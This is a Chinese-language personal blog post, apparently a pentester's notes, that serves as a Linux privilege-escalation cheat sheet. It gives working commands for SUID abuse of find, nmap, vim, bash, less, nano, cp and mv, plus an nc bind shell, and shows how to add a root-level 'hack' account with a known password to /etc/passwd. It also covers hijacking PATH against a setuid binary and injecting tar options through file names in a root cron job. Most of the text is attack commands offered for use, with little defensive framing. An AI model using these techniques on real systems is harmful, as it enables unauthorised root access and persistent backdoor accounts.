<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    

<script>!function(){var e=window.matchMedia&&window.matchMedia("(prefers-color-scheme: dark)").matches,t=localStorage.getItem("use-color-scheme")||"auto";("dark"===t||e&&"light"!==t)&&document.documentElement.classList.toggle("dark",!0)}()</script>

<meta charset="utf-8" >

<title>linux提权</title>
<meta name="keywords" content="linux提权, R0seW1thH3r">
<meta name="description" content="linux提权">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<link rel="shortcut icon" href="/archives/favicon.ico">
<link rel="stylesheet" href="/archives/style/main.css">


<link rel="stylesheet" href="/archives/style/jquery.fancybox.min.css">




    <link rel="stylesheet" href="/archives/style/prism.css"/>




  <meta name="generator" content="Hexo 6.1.0"></head>
  <body>
    <div id="app" class="main">

<div class="site-header-container">
  <div class="site-header">
    <div class="left">
      <a href="https://R0seW1thH3r.github.io/archives">
        <img class="avatar" src="/archives/images/avatar.png" alt="logo" width="32px" height="32px">
      </a>
      <a href="https://R0seW1thH3r.github.io/archives">
        <h1 class="site-title">R0seW1thH3r</h1>
      </a>
    </div>
    <div class="right">
        <i class="icon menu-switch icon-menu-outline" ></i>
    </div>
  </div>
</div>

<div class="menu-container" style="height: 0;opacity: 0;">
<nav class="menu-list">
  
    
      <a href="/archives/archives" class="menu purple-link">
        Index
      </a>
    
  
    
      <a href="/archives/tags" class="menu purple-link">
        Tags
      </a>
    
  
    
      <a href="/archives/about" class="menu purple-link">
        About
      </a>
    
  
</nav>
</div>



  <div class="content-container">
    <div class="post-detail">
      
      <h2 class="post-title">linux提权</h2>
      <div class="post-info post-detail-info">
        <span><i class="icon icon-calendar-outline"></i> 2022-08-01</span>
        
          <span>
          <i class="icon icon-pricetags-outline"></i>
            
              <a href="/archives/tags/%E5%86%85%E7%BD%91/">
              内网
                
              </a>
            
          </span>
        
      </div>
      <div class="post-content-wrapper">
        <div class="post-content">
          <h1 id="信息搜集自动化脚本"><a href="#信息搜集自动化脚本" class="headerlink" title="信息搜集自动化脚本"></a>信息搜集自动化脚本</h1><p>信息收集：<a target="_blank" rel="noopener" href="https://github.com/rebootuser/LinEnum">LinEnum</a>、<a target="_blank" rel="noopener" href="https://github.com/sleventyeleven/linuxprivchecker">linuxprivchecker</a><br>漏洞探针：<a target="_blank" rel="noopener" href="https://github.com/mzet-/linux-exploit-suggester">linux-exploit-suggester</a>、<a target="_blank" rel="noopener" href="https://github.com/jondonas/linux-exploit-suggester-2">linux-exploit-suggester2</a></p>
<h1 id="SUID提权"><a href="#SUID提权" class="headerlink" title="SUID提权"></a>SUID提权</h1><p>suid给予文件的一个特殊类型的文件权限，可以让文件以 拥有者的身份 运行。</p>
<p>如下图test文件有S权限，而且拥有者是root，那么当它运行时，就是以root身份运行的。</p>
<p><img src="/images/tq1.png" alt="tq1"></p>
<p>已知的可用来提权的 linux可行性的文件 列表如下：</p>
<ul>
<li>nmap</li>
<li>vim</li>
<li>find</li>
<li>bash</li>
<li>more</li>
<li>less</li>
<li>nano</li>
<li>cp</li>
</ul>
<p>也就是说，如果目标机里给以上文件赋予了suid权限，我们就可以用对应命令来提权。</p>
<p>首先就是要找到被赋予了suid的全部文件，以下命令可以发现系统上运行的所有SUID可执行文件：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">find</span> / -perm -u<span class="token operator">=</span>s -type f <span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null
<span class="token function">find</span> / -user root -perm -4000 -print <span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null
<span class="token function">find</span> / -user root -perm -4000 -exec <span class="token function">ls</span> -ldb <span class="token punctuation">&#123;</span><span class="token punctuation">&#125;</span> <span class="token punctuation">\</span><span class="token punctuation">;</span>
也可以使用 <span class="token function">sudo</span> -l 命令列出当前用户可执行的命令<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>使用后如下图，发现了find命令。</p>
<p><img src="/images/tq2.png" alt="tq2"></p>
<p><strong>find</strong></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">touch</span> <span class="token number">123</span>	<span class="token comment">#随便建立一个文件</span>
<span class="token function">find</span> <span class="token number">123</span> -exec <span class="token string">"/bin/sh"</span> <span class="token punctuation">\</span><span class="token punctuation">;</span> 	<span class="token comment">#提权，以root身份执行find命令，参数exec可以执行命令，这里直接调出sh的shell。</span>
<span class="token function">find</span> <span class="token builtin class-name">test</span> -exec netcat -lvp <span class="token number">5555</span> -e /bin/sh <span class="token punctuation">\</span><span class="token punctuation">;</span>	<span class="token comment">#nc反弹shell</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><strong>nmap</strong></p>
<blockquote>
<p>ls -la &#x2F;usr&#x2F;local&#x2F;bin&#x2F;nmap	让我们确认nmap是否设置了SUID位。</p>
</blockquote>
<ol>
<li>nmap（2.02-5.21）存在交换模式，可利用提权，我们可以在此模式下以交<br>互方式运行nmap，从而可以转至shell。如果nmap设置了SUID位，它将以root特权运行，我们可以通过其交互模式访问’root’shell。</li>
</ol>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">nmap –interactive 	<span class="token comment">#运行nmap交互模式</span>
<span class="token operator">!</span>sh 	<span class="token comment">#我们可以从nmap shell转到系统shell</span>
msf中的模块为：exploit/unix/local/setuid_nmap<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<ol start="2">
<li>使用<code>--script</code>参数：</li>
</ol>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">echo</span> <span class="token string">"os.execute('/bin/sh')"</span> <span class="token operator">></span> /tmp/shell <span class="token operator">&amp;&amp;</span> <span class="token function">sudo</span> nmap --script<span class="token operator">=</span>/tmp/shell<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>vi&#x2F;vim</strong></p>
<p>Vim的主要用途是用作文本编辑器。 但是，如果以SUID运行，它将继承root用户的权限，因此可以读取系统上的所有文件。</p>
<ol>
<li>打开vim，按下ESC</li>
</ol>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">:set <span class="token assign-left variable">shell</span><span class="token operator">=</span>/bin/sh
:shell<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<ol start="2">
<li>可能效果好一点：</li>
</ol>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">sudo</span> <span class="token function">vim</span> -c <span class="token string">'!sh'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>bash</strong></p>
<p>以root身份打开一个bash shell：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">bash</span> -p<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>less</strong></p>
<p>没啥用</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">less</span> /etc/passwd
<span class="token operator">!</span>/bin/sh<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p><strong>more</strong></p>
<p>没啥用</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell"><span class="token function">more</span> /home/pelle/myfile
<span class="token operator">!</span>/bin/bash<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p><strong>cp</strong></p>
<p>覆盖 &#x2F;etc&#x2F;shadow 或 &#x2F;etc&#x2F;passwd</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">cat</span> /etc/passwd <span class="token operator">></span>/tmp/passwd
openssl <span class="token function">passwd</span> -1 -salt hack hack123	<span class="token comment">#使用openssl加密密码</span>
<span class="token builtin class-name">echo</span> <span class="token string">'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash'</span> <span class="token operator">>></span> /tmp/passwd		<span class="token comment">#按照root格式写入passwd</span>
<span class="token function">cp</span> /tmp/passwd /etc/passwd
<span class="token function">su</span> hack		<span class="token comment">#切换用户</span>
hack123		<span class="token comment">#密码</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><strong>mv</strong></p>
<p>覆盖 &#x2F;etc&#x2F;shadow 或 &#x2F;etc&#x2F;passwd</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">cat</span> /etc/passwd <span class="token operator">></span>/tmp/passwd
openssl <span class="token function">passwd</span> -1 -salt hack hack123	<span class="token comment">#使用openssl加密密码</span>
<span class="token builtin class-name">echo</span> <span class="token string">'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash'</span> <span class="token operator">>></span> /tmp/passwd		<span class="token comment">#按照root格式写入passwd</span>
<span class="token function">mv</span> /tmp/passwd /etc/passwd
<span class="token function">su</span> hack		<span class="token comment">#切换用户</span>
hack123		<span class="token comment">#密码</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><strong>nano</strong></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">nano</span> /etc/passwd
ctrl+r
ctrl+x
reset<span class="token punctuation">;</span> <span class="token function">sh</span> <span class="token operator"><span class="token file-descriptor important">1</span>></span><span class="token file-descriptor important">&amp;0</span> <span class="token operator"><span class="token file-descriptor important">2</span>></span><span class="token file-descriptor important">&amp;0</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h1 id="内核漏洞"><a href="#内核漏洞" class="headerlink" title="内核漏洞"></a>内核漏洞</h1><p><strong>内核信息搜集</strong></p>
<p>一些基本命令收集一些Linux内核信息</p>
<table>
<thead>
<tr>
<th align="left">命令</th>
<th align="left">结果</th>
</tr>
</thead>
<tbody><tr>
<td align="left">uname -a</td>
<td align="left">打印所有可用的系统信息</td>
</tr>
<tr>
<td align="left">uname -m</td>
<td align="left">Linux内核体系结构（32或64位）</td>
</tr>
<tr>
<td align="left">uname -r</td>
<td align="left">内核发布</td>
</tr>
<tr>
<td align="left">uname -n 要么 hostname</td>
<td align="left">系统主机名</td>
</tr>
<tr>
<td align="left">cat &#x2F;proc&#x2F;version</td>
<td align="left">内核信息</td>
</tr>
<tr>
<td align="left">cat &#x2F;etc&#x2F;*-release 要么 cat &#x2F;etc&#x2F;issue</td>
<td align="left">发行信息</td>
</tr>
<tr>
<td align="left">cat &#x2F;proc&#x2F;cpuinfo</td>
<td align="left">CPU信息</td>
</tr>
<tr>
<td align="left">df -a</td>
<td align="left">文件系统信息</td>
</tr>
<tr>
<td align="left">dpkg –list 2&gt;&#x2F;dev&#x2F;null| grep complier |grep -v decompiler 2&gt;&#x2F;dev&#x2F;null &amp;&amp; yum list install ‘gcc*’ 2&gt;&#x2F;dev&#x2F;null| grep gcc 2&gt;&#x2F;dev&#x2F;null</td>
<td align="left">列出可用的编译器</td>
</tr>
</tbody></table>
<p><strong>搜索漏洞</strong></p>
<blockquote>
<p>网址：<a target="_blank" rel="noopener" href="http://www.exploit-db.com/">www.exploit-db.com</a></p>
<p>工具：searchsploit、msf</p>
</blockquote>
<p>把exp下载下来，按照步骤运行即可提权。</p>
<p>如果可以避免，请不要使用内核漏洞利用。如果使用它，可能会使计算机崩溃或使其处于不稳定状态。因此，内核漏洞利用应该是最后的手段。</p>
<h1 id="环境变量"><a href="#环境变量" class="headerlink" title="环境变量"></a>环境变量</h1><p>配合suid进行的环境变量提权。</p>
<p>使用echo命令就能轻易的查看和当前用户相关的环境变量存放的一些路径</p>
<blockquote>
<p>echo $PATH</p>
</blockquote>
<p>例如有demo.c这个文件，文件内容如下，你可以看到，我们调用了ps命令，即系统二进制文件</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span><span class="token string">&lt;unistd.h></span></span>
<span class="token keyword">void</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token function">setuid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">setgid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"ps"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>然后使用gcc命令编译demo.c文件并且赋予编译文件SUID权限，命令如下：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">gcc demo.c -o shell		<span class="token comment">#编译</span>
<span class="token function">chmod</span> u+s shell			<span class="token comment">#赋权限</span>
<span class="token function">ls</span> -la shell			<span class="token comment">#查看文件信息</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>那就是以拥有者的身份去运行。它使用了ps命令（查看进程命令），也就是以拥有者的身份使用ps命令。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">find</span> / -perm -u<span class="token operator">=</span>s -type f <span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>通过执行上述命令，攻击者可以遍历任何可执行文件，在这里我们可以看到demo.c编译之后的shell文件也在其中。</p>
<p>因为在实战中我们不知道shell文件执行了什么命令，所以我们可以运行一下shell</p>
<blockquote>
<p>.&#x2F;shell</p>
</blockquote>
<p>就能发现它是用了查看进程的ps命令。</p>
<p>那我们如果重写ps命令文件，然后把它加入环境变量，那么shell文件不就是执行的我们指定的命令吗。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">cd</span> /tmp		<span class="token comment">#一般到/tmp下操作</span>
<span class="token builtin class-name">echo</span> <span class="token string">"/bin/bash"</span> <span class="token operator">></span> <span class="token function">ps</span>		<span class="token comment">#新建一个ps文件，写入/bin/bash</span>
<span class="token function">chmod</span> <span class="token number">777</span> <span class="token function">ps</span>		<span class="token comment">#给权限</span>
<span class="token builtin class-name">echo</span> <span class="token environment constant">$PATH</span>		<span class="token comment">#查看环境变量</span>
<span class="token builtin class-name">export</span> <span class="token assign-left variable"><span class="token environment constant">PATH</span></span><span class="token operator">=</span>/tmp:<span class="token environment constant">$PATH</span>		<span class="token comment">#导入环境变量</span>
./shell		<span class="token comment">#再执行文件，提权成功</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>参考：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2767">Linux环境变量提权 - 先知社区 (aliyun.com)</a></p>
<h1 id="计划任务"><a href="#计划任务" class="headerlink" title="计划任务"></a>计划任务</h1><p>参考：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2401#toc-5">利用定时任务（Cronjobs）进行Linux提权 - 先知社区 (aliyun.com)</a></p>
<p>linux系统中<code>/etc/crontab</code>这个文件就是类似于存储定时任务的内容的文件。结构如下图：</p>
<p><img src="/images/tq3.png" alt="tq3.png"></p>
<p>前面的<code>*</code>是年月日时间这些参数，root是执行人，后面是执行的命令。</p>
<p><strong>Crontab Tar Wildcard注入</strong></p>
<ul>
<li>Crontab：计划任务</li>
<li>Tar：tar打包命令</li>
<li>Wildcard：<strong>通配符</strong></li>
</ul>
<p><em>不安全的定时任务备份命令</em>：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">*  *    * * *   root    <span class="token builtin class-name">cd</span> /home/kali/test<span class="token punctuation">;</span><span class="token function">tar</span> czf /tmp/tmp/backup.tar.gz *<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>以root身份使用tar命令进行打包，最后有一个<code>*</code>通配符  ，会匹配所有的文件名。</p>
<p>我们执行以下命令：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">echo</span> <span class="token string">'cp /bin/bash /tmp/tmp/bash;chmod +s /tmp/tmp/bash'</span> <span class="token operator">></span> test.sh		<span class="token comment">#创建恶意脚本</span>
<span class="token builtin class-name">echo</span> <span class="token string">""</span> <span class="token operator">></span> <span class="token string">"--checkpoint-action=exec=sh test.sh"</span>		<span class="token comment">#新建文件名为--checkpoint-action=exec=sh test.sh的文件</span>
<span class="token builtin class-name">echo</span> <span class="token string">""</span> <span class="token operator">></span> --checkpoint<span class="token operator">=</span><span class="token number">1</span>	<span class="token comment">#新建文件名为--checkpoint=1的文件</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>解释：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">tar</span> czf /tmp/tmp/backup.tar.gz *
变成了↓
<span class="token function">tar</span> czf /tmp/tmp/backup.tar.gz --checkpoint-action<span class="token operator">=</span>exec<span class="token operator">=</span>sh test.sh --checkpoint<span class="token operator">=</span><span class="token number">1</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>文件名变成tar命令的参数，从而执行了我们建立的test.sh恶意文件，所以就在tmp目录下生成suid的bash文件。</p>
<p>等一分钟后就会在&#x2F;tmp&#x2F;tmp目录下发现有个bash文件，执行：</p>
<blockquote>
<p>.&#x2F;bash -p</p>
</blockquote>
<p>然后就提权成功了。</p>
<hr>
<p>参考：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7924#toc-17">对Linux 提权的简单总结 - 先知社区 (aliyun.com)</a></p>

        </div>
        <div class="top-div">
          <ol class="top-box"><li class="top-box-item top-box-level-1"><a class="top-box-link" href="#%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86%E8%87%AA%E5%8A%A8%E5%8C%96%E8%84%9A%E6%9C%AC"><span class="top-box-text">信息搜集自动化脚本</span></a></li><li class="top-box-item top-box-level-1"><a class="top-box-link" href="#SUID%E6%8F%90%E6%9D%83"><span class="top-box-text">SUID提权</span></a></li><li class="top-box-item top-box-level-1"><a class="top-box-link" href="#%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E"><span class="top-box-text">内核漏洞</span></a></li><li class="top-box-item top-box-level-1"><a class="top-box-link" href="#%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F"><span class="top-box-text">环境变量</span></a></li><li class="top-box-item top-box-level-1"><a class="top-box-link" href="#%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1"><span class="top-box-text">计划任务</span></a></li></ol>
        </div>
      </div>
    </div>

    
      <div class="next-post">
        <a class="purple-link" href="/archives/2022/07/23/%E5%9F%BA%E7%A1%80%E8%AE%BE%E6%96%BD%E6%90%AD%E5%BB%BA/">
          <h3 class="post-title">
            下一篇：vps基础设施搭建
          </h3>
        </a>
      </div>
    
  </div>




<footer>
<div class="site-footer">
  <div class="social-container">
    
      
        <a href="https://github.com/" target="_blank">
          <i class="icon icon-github"></i>
        </a>
      
    
      
        <a href="https://twitter.com/" target="_blank">
          <i class="icon icon-twitter"></i>
        </a>
      
    
      
    
      
    
      
    
  </div>
  
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> <a href="https://github.com/f-dong/hexo-theme-minimalism" target="_blank">Theme</a>
  
  
  
  
  
  
</div>
</footer>


      </div>
      
    <script src="/archives/js/jquery.min.js"></script>
    <script src="/archives/js/jquery.fancybox.min.js"></script>


<script id="hexo-configurations">
    window.theme_config = {"image":{"lazyload_enable":false}};
    window.is_post = true;
  </script>

<script src="/archives/js/main.js"></script>





    </div>
  </body>
</html>

